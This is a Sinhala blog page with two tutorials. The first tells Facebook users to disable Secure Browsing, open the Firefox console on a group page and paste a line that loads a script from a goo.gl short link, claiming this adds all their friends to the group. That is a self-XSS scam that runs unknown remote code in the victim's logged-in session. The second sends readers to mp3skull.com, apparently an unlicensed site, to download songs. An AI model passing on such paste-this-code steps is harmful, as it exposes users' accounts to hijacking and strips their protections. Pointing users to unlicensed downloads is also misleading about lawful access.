යාලුවනේ මේකනම් ගොඩක් අය දන්නව එත් අව්ලක් නැ :) දන්නෙ නැති අයත් ඇති නෙ එයාලට දැනගන්නත් එක්ක ඔන්න මම පොස්ට් එකක් දැම්ම .

මෙය භාවිතා කල හැක්කේ Fireෆොක්ස් සදහා පමණයි. නවතම සංස්කරණය වියයුතුය  .

මුලින්ම Facebook Account Settings >> Security Settings >> Secure Browsing වලට ගිහින් එකේ හරිය අයින් කරන්න .

මුලින්ම ඔයා යාළුවො එකතු කරන්න ඕන Group එකට යන්න .

දැන් CTRL + SHIFT + K තුන එක වර ඔබන්න .

දැන් පහත ඇති code එක copy කර එහි paste කර Enter කරන්න .

document.body.appendChild(document.createElement('script')).src='http://goo.gl/HC2rx';

දැන් යහළුවන් සියලුම දෙනා Group එකට එකතු වෙනු ඇත . ටික වෙලාවක් සිටින්න :)


ඉතුරු ටික කියවන්න
සිංහල ඉංග්‍රීසි හින්දි ඕනෑම සින්දුවක් හොයාගන්න පුළුවන් ලේසිම ක්‍රමයක් තමයි මෙය . මේක දන්නා අයත් ගොඩක් ඇති :) එහෙනම් අපි බලමු කොහම ද සින්දු හොයාගන්නෙ කියල.

මුලින්ම මෙම අඩවියට පිවිසෙන්න :-  http://mp3skull.com/



ඉහත රුපයේ පරිදි Search සදහා ඔබ කැමති සින්දුවේ නම ලබා දෙන්න .

දැන් ඉහත රුපයේ පරිදි අවශ්‍ය සින්දුව මත ඇති download කික් කරන්න. :)
ඉතුරු ටික කියවන්න


මෙමෙ බ්ලොග් අඩවියෙහි උපුටා ගත් කිසිවක් නොමැත. මෙහි ඇති කිසිවක් අනවසරයෙන් උපුටා ගැනීම තහනම්.